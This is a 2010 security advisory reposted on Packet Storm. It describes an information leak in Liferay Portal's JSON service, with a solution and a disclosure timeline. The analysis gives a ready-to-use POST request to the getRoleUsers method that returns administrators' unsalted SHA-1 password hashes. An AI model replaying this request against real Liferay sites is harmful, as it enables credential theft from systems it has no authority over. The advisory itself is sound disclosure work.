Liferay JSON Service Information Leakage

2010-08-13T00:00:00
ID PACKETSTORM:92733
Type packetstorm
Reporter Stefano Di Paola
Modified 2010-08-13T00:00:00

Description

                                        
                                            `Minded Security Labs: Advisory #MSA251009  
Liferay Json Service Multiple Information Leakage  
  
Tested Versions:   
Liferay Portal 4.x and 5.x  
  
  
Minded Security ReferenceID:  
MSA251009  
  
  
Credits:  
Discovery by   
Stefano Di Paola of Minded Security   
stefano.dipaola [_at_] mindedsecurity.com  
  
  
Reference:  
http://issues.liferay.com/browse/LPS-9555  
  
  
Severity:   
High: it is possible to access functionalities and   
sensitive users' information.  
  
  
Solution:   
Grant access only to standard web functionalities and prevent direct  
access to JSON service.  
  
  
Summary  
  
It is possible to access several classes and static methods and obtain serveral  
sensitive information.  
  
  
Analysis  
  
  
It is possible to access several methods making a direct request to the following URL  
  
https://<yoursite>/c/portal/json_service  
  
via POST with a payload like the following:  
  
callback=<JavascriptFunctionName>&serviceClassName=  
com.liferay.portal.service.http.<ClassName>JSON&serviceMethodName=<  
StaticMethodName>&parameter1=<Value>&parameter2=<Value>  
&serviceParameters=parameter1,parameter2...etc   
  
  
  
An authenticated user can perform a request like the previous to obtain an answere  
from the server like the following:  
  
HTTP/1.1 200 OK FunctionNameJs({response JSON object});   
  
  
  
It was possible to analize the accessible methods and it was noted that several   
classes and static methods are accessible, but a lot of them perform access control.  
  
However, there are several methods that return information about users that do not   
perform administrative access control or that are allowed to logged users.   
This methods can be used to obtain sensitive information.  
  
For example, an attacker could use the method "getRoleUsers" in order to obtain   
internal Liferay passwords in SHA-1 format coded in Base64 making the following   
request (administrative role id is 10107).  
  
POST /c/portal/json_service HTTP/1.1 callback=ss&  
serviceClassName=com.liferay.portal.service.http.UserServiceJSON  
&serviceMethodName=getRoleUsers&roleId=10107&  
screenName=getRoleUsers&serviceParameters=roleId HTTP/1.1 200 OK ss([{"portraitId":0,"agreedToTermsOfUse":true,"passwordEncrypted":true,  
"screenName":"liferayadmin","password":"yg\/MD******************hs=",  
"passwordReset":false,"defaultUser":false,  
"lastFailedLoginDate":"1253900971","userId":10133....   
  
  
As it is possible to see, inside the server answere there is the object related to   
the admin user with his own password in SHA-1 format (without salt).  
  
  
Disclosure Timeline  
  
25/10/09 Issue found  
12/05/10 Reported to Vendor  
  
  
Disclaimer  
  
  
The information within this paper may change without notice. Use  
of this information constitutes acceptance for use in an AS IS  
condition. There are NO warranties with regard to this information.  
  
In no event shall the author be liable for any damages whatsoever   
arising out of or in connection with the use or spread of this   
information.  
  
Any use of this information is at the user's own risk.  
Permission is hereby granted for the redistribution of this Alert  
electronically. It is not to be edited in any way without express  
consent of Minded Security Research Lab. If you wish to reprint the  
whole or any part of this Alert in any other medium excluding  
electronic medium, please e-mail research_at_mindedsecurity.com   
for permission.  
  
  
  
Copyright (c) 2010 Minded Security, S.r.l..  
  
All rights reserved worldwide.  
  
  
  
`